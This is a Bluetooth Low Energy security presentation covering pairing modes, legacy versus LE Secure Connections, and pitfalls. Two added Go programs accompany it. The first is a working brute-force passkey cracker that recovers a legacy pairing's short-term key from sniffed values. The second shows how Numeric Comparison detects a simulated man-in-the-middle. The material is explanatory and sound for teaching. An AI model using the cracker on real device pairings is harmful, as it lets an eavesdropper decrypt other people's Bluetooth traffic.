Bluetooth low energy security, how good is it? Petter Myhre Bluetooth World, San Jose March 2017


Common Types of Attack

Passive Eavesdropping
- Sniffing packets sent between two peers

Man-in-the-Middle (MITM) attack
- Active eavesdropping: the attacker monitors and injects packets
- Acts as a relay between the two peers

Basics
- Pairing is authenticating another device and establishing temporary shared secret keys which can be used to encrypt a link
- Bonding is pairing followed by distribution of keys which can be used to encrypt the link in

Security Modes and Levels

Security Mode 1
- Level 1: No security. No authentication and no encryption
- Level 2: Unauthenticated pairing with encryption, but no MITM protection
- Level 3: Authenticated pairing with encryption and MITM protection
- Level 4: Authenticated LE Secure Connections (LESC) pairing with encryption and MITM protection

Security Mode 2 (not covered)
- Level 1: Unauthenticated pairing with data signing
- Level 2: Authenticated pairing with data signing

Authentication and Encryption Procedures
- Each time two devices connect, the connection operates in security level 1 (no security)
- A higher level of security is achieved by performing:
  - Authentication procedure: unauthenticated pairing results in security level 2; authenticated pairing results in security level 3 or 4
  - Encryption procedure: the connection is encrypted with encryption keys already available, typically keys that were shared and stored after previously bonding. The original pairing determines the achieved security level

Phases
Pairing is a two-phase process; bonding includes a third phase:
- Phase 1: Feature Exchange
- Phase 2A: Legacy Pairing - Short Term Key (STK) Generation, or
- Phase 2B: LESC - Long Term Key (LTK) Generation
- Phase 3: Key Distribution (bonding only)

Phase 1 Feature Exchange
Determines:
- How Phase 2 should be performed
- If Phase 3 should be performed
Features exchanged:
- LESC support
- Authenticated MITM protection
- IO capabilities
- Out of Band (OOB) authentication data availability
- Bonding

Phase 2A Legacy Pairing STK Generation
- Just Works: encryption is secure only if no attack is performed during pairing. Security level 2: unauthenticated pairing with encryption, but no MITM protection
- Passkey Entry: 6 numeric digits shared between the devices using their IO capabilities. Provides protection against MITM attacks, but very limited protection against eavesdropping during pairing. Security level 3: authenticated pairing with encryption and MITM protection
- Out-of-Band (OOB): encryption keys based on data transferred by other means, for example NFC. Provides protection, assuming that the OOB communication is secure. Security level 3: authenticated pairing with encryption and MITM protection
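The Go program below is an added example, not part of the presentation. It implements the legacy pairing functions c1 (confirm value) and s1 (STK generation) from Core Spec Vol 3 Part H in the spec's MSB-first notation, runs a Passkey Entry pairing between two simulated peers, and then plays the passive eavesdropper: knowing only the cleartext pairing parameters, Mconfirm and Mrand, it tries all 10^6 passkeys until c1 reproduces Mconfirm (for Just Works the TK is simply 0, so the search ends at the first try). With the TK recovered, the attacker computes the same STK as the peers, which is why the slide says Passkey Entry gives only very limited protection against eavesdropping during pairing. The Pairing Request/Response PDUs, addresses and random values are constructed sample data, and the names Sniffed, LegacyPairing and CrackPasskey are introduced here; a real capture additionally needs the SMP fields byte-reversed, since they are sent little-endian over the air.

```go
package main

import (
	"crypto/aes"
	"encoding/binary"
	"fmt"
)

// e is the AES-128 block function every legacy pairing primitive is built on (Core Spec Vol 3 Part H 2.2.1).
func e(key, plaintext [16]byte) (out [16]byte) {
	block, _ := aes.NewCipher(key[:]) // 16-byte key: cannot fail
	block.Encrypt(out[:], plaintext[:])
	return out
}

func xor16(a, b [16]byte) [16]byte {
	for i := range a {
		a[i] ^= b[i]
	}
	return a
}

// Sniffed holds the pairing parameters a passive listener reads in the clear.
type Sniffed struct {
	PReq, PRes [7]byte // Pairing Request / Response PDU payloads (opcode + 6 parameter octets)
	IAT, RAT   byte    // initiating / responding address types
	IA, RA     [6]byte // initiating / responding device addresses
}

// c1 is the confirm value function (2.2.3): c1(k, r, preq, pres, iat, rat, ia, ra) = e(k, e(k, r XOR p1) XOR p2).
func c1(k, r [16]byte, s Sniffed) [16]byte {
	var p1, p2 [16]byte
	copy(p1[0:7], s.PRes[:]) // p1 = pres || preq || rat' || iat', most significant octet first
	copy(p1[7:14], s.PReq[:])
	p1[14], p1[15] = s.RAT, s.IAT
	copy(p2[4:10], s.IA[:]) // p2 = padding (4 zero octets) || ia || ra
	copy(p2[10:16], s.RA[:])
	return e(k, xor16(e(k, xor16(r, p1)), p2))
}

// s1 is the key generation function (2.2.4): s1(k, r1, r2) = e(k, r1' || r2'), where r1' and r2'
// are the least significant 64 bits of each random value.
func s1(k, r1, r2 [16]byte) [16]byte {
	var r [16]byte
	copy(r[0:8], r1[8:16])
	copy(r[8:16], r2[8:16])
	return e(k, r)
}

// tkFromPasskey places a 6-digit passkey in the Temporary Key as a 128-bit MSB-first integer.
// Just Works is the special case passkey 0, i.e. TK = 0.
func tkFromPasskey(passkey uint32) (tk [16]byte) {
	binary.BigEndian.PutUint32(tk[12:], passkey)
	return tk
}

// LegacyPairing runs both sides of a legacy Passkey Entry (or Just Works) pairing over the
// parameters in s and returns the master's confirm value (sent before Mrand, as a commitment
// that the slave checks once Mrand is revealed) and the STK both sides derive.
func LegacyPairing(s Sniffed, passkey uint32, mrand, srand [16]byte) (mconfirm, stk [16]byte) {
	tk := tkFromPasskey(passkey)
	return c1(tk, mrand, s), s1(tk, srand, mrand)
}

// CrackPasskey is the eavesdropper: with only the sniffed values it tries every passkey until c1
// reproduces Mconfirm, exactly the check the slave performs. Returns -1 if no 6-digit passkey
// matches (e.g. OOB pairing with a random 128-bit TK).
func CrackPasskey(s Sniffed, mconfirm, mrand [16]byte) int {
	for pk := uint32(0); pk < 1000000; pk++ {
		if c1(tkFromPasskey(pk), mrand, s) == mconfirm {
			return int(pk)
		}
	}
	return -1
}

// SampleSniff is a constructed capture: a KeyboardDisplay initiator requesting bonding + MITM,
// a DisplayOnly responder, so the devices pick Passkey Entry.
func SampleSniff() Sniffed {
	return Sniffed{
		PReq: [7]byte{0x01, 0x04, 0x00, 0x05, 0x10, 0x01, 0x01},
		PRes: [7]byte{0x02, 0x00, 0x00, 0x05, 0x10, 0x01, 0x01},
		IAT:  0x01, RAT: 0x00,
		IA:   [6]byte{0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6},
		RA:   [6]byte{0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6},
	}
}

func main() {
	s := SampleSniff()
	// Constructed random values; in an attack they come from the radio capture.
	mrand := [16]byte{0x57, 0x83, 0xD5, 0x21, 0x56, 0xAD, 0x6F, 0x0E, 0x63, 0x88, 0x27, 0x4E, 0xC6, 0x70, 0x2E, 0xE0}
	srand := [16]byte{0x0F, 0x1E, 0x2D, 0x3C, 0x4B, 0x5A, 0x69, 0x78, 0x87, 0x96, 0xA5, 0xB4, 0xC3, 0xD2, 0xE1, 0xF0}
	mconfirm, stk := LegacyPairing(s, 123456, mrand, srand)
	pk := CrackPasskey(s, mconfirm, mrand)
	attackerSTK := s1(tkFromPasskey(uint32(pk)), srand, mrand)
	fmt.Printf("recovered passkey %06d, attacker STK equals peers' STK: %v\n", pk, attackerSTK == stk)
}
```

The search costs at most two million AES block operations, well under a second on a laptop, which is the whole "security" margin of a legacy passkey against a sniffer. A static passkey makes this worse: once recovered it also breaks every later pairing with the same device.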

LE Secure Connections
- Added in the Bluetooth Core Specification version 4.2
- Provides protection against eavesdropping
- Provides better protection against MITM attacks
- FIPS-approved algorithms
- Uses Elliptic Curve Diffie-Hellman (ECDH) key agreement: allows two peers, each having a public-private key pair, to establish a shared secret key over an insecure channel
- The shared secret is used in the derivation of the encryption keys

Phase 2B LESC LTK Generation
- Just Works: no protection against MITM attacks during pairing. The pairing is unauthenticated, so the result is security level 2
- Passkey Entry: provides MITM protection
- Numeric Comparison: provides MITM protection. A 6-digit value is displayed on both devices and confirmed on both sides by the user pressing OK
- OOB: provides MITM protection, assuming the OOB communication is secure
- The authenticated methods (Passkey Entry, Numeric Comparison, OOB) achieve security level 4: authenticated LESC pairing with encryption and MITM protection
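The Go program below is an added example, not the presenter's code. It builds the LESC key derivation from the spec's primitives: an AES-CMAC implementation (RFC 4493), f5 for MacKey/LTK derivation and g2 for the Numeric Comparison value, on top of P-256 ECDH from Go's crypto/ecdh (Go 1.20 or later). It runs an honest Numeric Comparison pairing between two simulated devices, then the same exchange with a MITM that substitutes its own key pair and nonce toward each side: in the honest case both LTKs match and both displays show the same number, while under the MITM each victim derives a key shared with the attacker and the two displays disagree, which is what lets the user catch the attack and why Just Works, with nothing to compare, cannot. The commitment f4 and the DHKey check f6 are omitted; the type Side and the function Complete are names introduced here; addresses are constructed and keys and nonces freshly generated; all values follow the spec's MSB-first notation rather than the little-endian wire order.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/ecdh"
	"crypto/rand"
	"encoding/binary"
	"fmt"
)

// dbl doubles a 128-bit block in GF(2^128): the CMAC subkey step (RFC 4493, Rb = 0x87).
func dbl(in [16]byte) (out [16]byte) {
	var carry byte
	for i := 15; i >= 0; i-- {
		out[i], carry = in[i]<<1|carry, in[i]>>7
	}
	if carry != 0 {
		out[15] ^= 0x87
	}
	return out
}

// aesCMAC implements AES-CMAC (RFC 4493); f5 and g2 below are thin wrappers around it.
func aesCMAC(key [16]byte, msg []byte) [16]byte {
	block, _ := aes.NewCipher(key[:]) // 16-byte key: cannot fail
	var l, x, last [16]byte
	block.Encrypt(l[:], l[:]) // L = AES(K, 0^128)
	k1, k2 := dbl(l), dbl(dbl(l))
	for len(msg) > 16 { // CBC-MAC over every block except the last
		for j := range x {
			x[j] ^= msg[j]
		}
		block.Encrypt(x[:], x[:])
		msg = msg[16:]
	}
	rem := copy(last[:], msg)
	if rem < 16 { // incomplete final block: pad 10..0 and switch to K2
		last[rem], k1 = 0x80, k2
	}
	for j := range x {
		x[j] ^= last[j] ^ k1[j]
	}
	block.Encrypt(x[:], x[:])
	return x
}

// f5 (Core Spec Vol 3 Part H 2.2.7): MacKey and LTK from the DHKey w, both nonces and both 7-octet addresses (type || address).
func f5(w []byte, n1, n2 [16]byte, a1, a2 [7]byte) (macKey, ltk [16]byte) {
	salt := [16]byte{0x6C, 0x88, 0x83, 0x91, 0xAA, 0xF5, 0xA5, 0x38, 0x60, 0x37, 0x0B, 0xDB, 0x5A, 0x60, 0x83, 0xBE}
	t := aesCMAC(salt, w)
	msg := func(counter byte) []byte { // Counter || keyID "btle" || N1 || N2 || A1 || A2 || Length (256 bits)
		return bytes.Join([][]byte{{counter, 'b', 't', 'l', 'e'}, n1[:], n2[:], a1[:], a2[:], {0x01, 0x00}}, nil)
	}
	return aesCMAC(t, msg(0)), aesCMAC(t, msg(1))
}

// g2 (2.2.9): the 6-digit Numeric Comparison value; u, v are the initiator's and responder's public-key X coordinates, x and y their nonces.
func g2(u, v []byte, x, y [16]byte) uint32 {
	m := aesCMAC(x, bytes.Join([][]byte{u, v, y[:]}, nil))
	return binary.BigEndian.Uint32(m[12:]) % 1000000 // low 32 bits, shown to the user mod 10^6
}

// Side is one device: its P-256 key pair, pairing nonce and address (type || address).
type Side struct {
	Key   *ecdh.PrivateKey
	Nonce [16]byte
	Addr  [7]byte
}

func NewSide(addr [7]byte) *Side {
	key, err := ecdh.P256().GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	s := &Side{Key: key, Addr: addr}
	rand.Read(s.Nonce[:])
	return s
}

// Complete is what one side computes once public keys and nonces have been exchanged: the value it shows the user and the LTK it derives. Peer values are whatever arrived over the air.
func Complete(self *Side, initiator bool, peerPub *ecdh.PublicKey, peerNonce [16]byte, peerAddr [7]byte) (uint32, [16]byte) {
	dhkey, _ := self.Key.ECDH(peerPub) // both keys are P-256, so this cannot fail; X coordinate of the shared point
	u, v := self.Key.PublicKey().Bytes()[1:33], peerPub.Bytes()[1:33] // uncompressed point: 0x04 || X || Y
	na, nb, aa, ab := self.Nonce, peerNonce, self.Addr, peerAddr
	if !initiator { // g2 and f5 take the initiator's values first
		u, v, na, nb, aa, ab = v, u, nb, na, ab, aa
	}
	_, ltk := f5(dhkey, na, nb, aa, ab)
	return g2(u, v, na, nb), ltk
}

func main() {
	a := NewSide([7]byte{0x00, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6}) // constructed public addresses
	b := NewSide([7]byte{0x00, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6})
	va, ltkA := Complete(a, true, b.Key.PublicKey(), b.Nonce, b.Addr)
	vb, ltkB := Complete(b, false, a.Key.PublicKey(), a.Nonce, a.Addr)
	fmt.Printf("honest: A shows %06d, B shows %06d, same LTK: %v\n", va, vb, ltkA == ltkB)
	m := NewSide(b.Addr) // active MITM: its own key and nonce are what each victim receives
	va, _ = Complete(a, true, m.Key.PublicKey(), m.Nonce, b.Addr)
	vb, _ = Complete(b, false, m.Key.PublicKey(), m.Nonce, a.Addr)
	fmt.Printf("MITM:   A shows %06d, B shows %06d\n", va, vb)
}
```

Two points worth taking from the code: the LTK never crosses the air (it is derived by both sides from the ECDH secret and the nonces, so a sniffer of the whole exchange learns nothing), and the displayed number is bound to both public keys, so an attacker who has replaced them cannot make the two displays agree except by a one-in-a-million guess.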

Phase 3 Key Distribution
With bonding, the following keys can be distributed:
- Legacy: LTK, EDIV, Rand, IRK
- LESC: IRK (the LTK is derived from the ECDH shared secret in Phase 2B and is not distributed)


Common Pitfalls

Be aware that:
- Security is optional
- Encryption != secure
- Security requirements must be set on characteristic values
- A static passkey is not the intended use
- The packet header is not encrypted, so empty packets are not encrypted
- Keep something open

Application Requirements
- What kind of security does the application require?
- What kind of attacks do you want to protect against? Eavesdroppers? MITM attacks? Something else?
- What kind of security is achievable? LESC? OOB? IO capabilities? Passkey Entry? Numeric Comparison? Pairing in a safe environment?
- What about the peers?

How good is it?
- Legacy Just Works and Passkey Entry: secure if paired in a safe environment
- Legacy OOB: secure if the OOB communication is safe
- LESC Just Works: secure if paired in a safe environment; protects against eavesdroppers
- LESC Numeric Comparison and Passkey Entry: secure
- LESC OOB: secure and most convenient
